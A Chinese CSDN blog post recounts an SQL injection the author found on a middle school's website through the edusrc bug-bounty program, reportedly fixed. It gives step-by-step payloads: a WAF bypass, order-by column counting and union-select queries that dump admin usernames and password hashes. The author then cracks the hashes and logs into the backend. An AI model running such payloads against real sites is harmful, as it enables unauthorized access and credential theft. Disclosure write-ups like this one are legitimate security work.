记一次挖edusrc漏洞挖掘(sql注入)

最新推荐文章于 2024-05-15 03:37:40 发布
最新推荐文章于 2024-05-15 03:37:40 发布
阅读量1.9k 收藏 22
点赞数 4
分类专栏: web安全 文章标签: web安全 安全 网络安全 网络攻击模型 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53343630/article/details/128747967
版权

在利用fofa收集信息的时候发现的,我这里直接开始挖洞部分写了。

前言:

目标是一个中学的站点,在一次挖洞过程中遇到个sql注入,漏洞已报送平台进行了修复。该文章仅用于交流学习,切勿利用相关信息非法测试,我也是刚入门的小白,欢迎各位大佬指点。

访问url/gywm.asp?id=95%20and%201=1被拦截了(Wts-waf我这里利用了此文章

https://www.freebuf.com/articles/268726.html

url/gywm.asp?id=95 +and+1=1的时候返回正常

url/gywm.asp?id=95 +and+1=2时候返回空白页面

已确定存在sql注入漏洞;

开始使用order by获得表的列数

访问url/gywm.asp?id=95+order+by+19--+的时候页面正常的;

访问: url/gywm.asp?id=95+order+by+20--+的时候页面显示500

判断出列数为19,此时我们可以通过union联合查询进行注入。

Payload:
url/gywm.asp?id=95+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin

此时我们可知admin的位置所以我把猜出来的表和列名放在了3和10的位置, 这下就已拿到了这两列名中的值。


Payload: 
url/gywm.asp?id=95+union+select+1,2,username,4,5,6,7,8,9,userpass,11,12,13,14,15,16,17,18,19+from+admin

账户密码都爆出来了然后去把md5密码解密后直接进去后台渗透也到此结束

Uyhacked
关注
  • 4
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次取学校edusrc——SQL注入
CC__Faker的博客
06-07 5062
前言 这次漏洞发现其实并不是刻意去扫描掘的,当时是百度搜了下学校站点,查到本校的继续教育学院,里面有个录取结果查询模块。随手测了几句sql发现竟然报错了,于是开始对漏洞危害的验证。 0x00 测试工具 burpsuite sqlmap 0x01注点判断 常规and 1=1 ,1=2试试,网页正常反馈。 尝试让页面报错。 没想到出现了回显信息,回显信息中还打印了sql语句,网站目录等信息。 1)SQL语句为”SELECT * FROM baoming_list WHERE shenfenzhengh
国内SRC漏洞挖掘技巧与经验分享
01-29
SQL注入、XSS跨站脚本、CSRF跨站请求伪造等常见漏洞需要特别关注。理解OWASP Top Ten,掌握各种攻防策略,有助于提高掘效率。 5. **安全配置**:不正确的系统配置也是漏洞的来源。例如,未打补丁的系统、弱密码...
某学院系统sql注入到服务器沦陷(bypss)
蚁景网安学院
06-04 399
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
2024年最新一次取某校src——SQL注入(1),2024年最新HarmonyOS鸿蒙事件体系全面总结+实践分析
最新发布
2401_84862038的博客
05-15 611
根据Sqlmap的日志结果可以看出录取查询结果模块,存在布尔盲注和延时注入的漏洞,网站是PHP 7.0.33和Nginx搭建,由此可以判断网站环境是LMNP。可以看到和我之前判断的一样,POST请求,提交至chaxun.php,请求参数有三个type、name、user_id,数据没有加密。料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上鸿蒙开发知识点,真正体系化!,再连接数据库进行判断。将burp抓到的数据包保存为1.txt,在注入点加入*方便工具注点识别,丢到sqlmap去跑。
Edusrc漏洞挖掘 | Sql注入九连杀(一)
weixin_66717977的博客
03-13 499
一次edusrc漏洞挖掘sql注入九连杀的第一章
萌新sql注入漏洞的过程全
qq_42468569的博客
11-02 1807
sql注入漏洞萌新
WEB安全SQL注入
信安是不可或缺的一部分!
02-18 1737
2021年OWASP发布漏洞威胁榜单,SQL注入从第一名下降到第三(https://owasp.org/Top10/),SQL注入是一种常见的Web攻击技术,通过构造恶意的SQL语句来破坏数据库安全。攻击者可以通过提交带有恶意代码的输入,例如网页表单,来控制数据库执行恶意语句。这样,攻击者可以访问敏感信息,修改数据,甚至删除整个数据库。为了防范SQL注入攻击,开发人员应该使用参数化查询或存储过程,并对用户输入进行严格的验证和过滤。这样可以确保用户输入不会被作为恶意代码注入到数据库中。
我的第一次edusrc漏洞挖掘 (三连
M1n9K1n9的博客
01-26 8170
弱口令未授权访问任意文件上传文章内提及的漏洞均已修复!白帽子在掘、提交相关漏洞的过程中,应严格遵守中华人民共和国相关法律法规。
SQL注入漏洞全接触.ppt
11-15
一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到...
php中sql注入漏洞示例 sql注入漏洞修复
12-18
 一、SQL注入的步骤 a) 寻找注入点(如:登录界面、留言板等) b) 用户自己构造SQL语句(如:’ or 1=1#,后面会讲解) c) 将sql语句发送给数据库管理系统(DBMS) d) DBMS接收请求,并将该请求解释成机器代码指令,...
SQL注入漏洞挖掘.pptx
10-27
SQL 注入漏洞挖掘 SQL 注入漏洞挖掘是指攻击者通过构造特殊的输入,来 trick 数据库执行恶意的 SQL 语句,从而获取敏感信息或控制数据库的权限。 SQL 注入漏洞是 Web 应用程序中最常见的安全漏洞之一,攻击者可以...
edusrc-web:edusrc用户主页数据分析与查询
03-15
edusrc网站 edusrc用户主页在线数据分析与查询
第86天:SRC掘-教育行业平台&规则&批量自动化1
08-03
SRC 掘-教育行业平台&规则&批量自动化参考:https://src.sjtu.edu.cn/introduction/1.法律法规:第八条 按照对信息系统
利用SQL注入漏洞登录后台的实现方法
12-15
早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。 如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的网站都已经补上漏洞。但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的...
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
SQL注入漏洞简单掘-01
09-15
本课程提供了一个详细的SQL注入漏洞挖掘指南,包括环境搭建、自动化审计工具、直接掘select注入和漏洞验证POC等等。通过学习这些内容,我们可以更好地理解SQL语言的工作原理,并且学会如何检测和exploit SQL注入...
一次教育src通杀掘历程!!!
m0_53844310的博客
04-23 1047
一次教育src漏洞挖掘历程
ASP SQL注入
星梦小筑
02-26 898
注入表达式类型: 'and 1='1 原理:ASP网站一般采用的SQL语句:strsql="select * from xx where xx='"&value&"'"    加上注入语句再解释到SQL则成为:select * from xx where xx='value' and 1='1'    无疑如果没有过滤注入的话,这会返回正常页面的,但如果改成    select * fro
谷歌/FOFA搜索引擎使用
莫黎小天
01-21 3842
谷歌搜索引擎的使用 1.谷歌语法 利用搜索引擎在渗透测试过程搜索到特定页面的一种语法 “xxx” :将要搜索的关键字用引号括起来(表示完全匹配,即关键词不能分开,顺序也不能变) +:“xxx” +baidu.com 搜索xxx与baidu.com相关的内容 -: “xxx”-baidu.com 搜索结果里面除去baidu.com相关的内容 2.谷歌语法基础使用 site:指定域名,如:site:edu.cn inurl:用于搜索包含的url关键词的网页,如:inurl:login 搜索

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值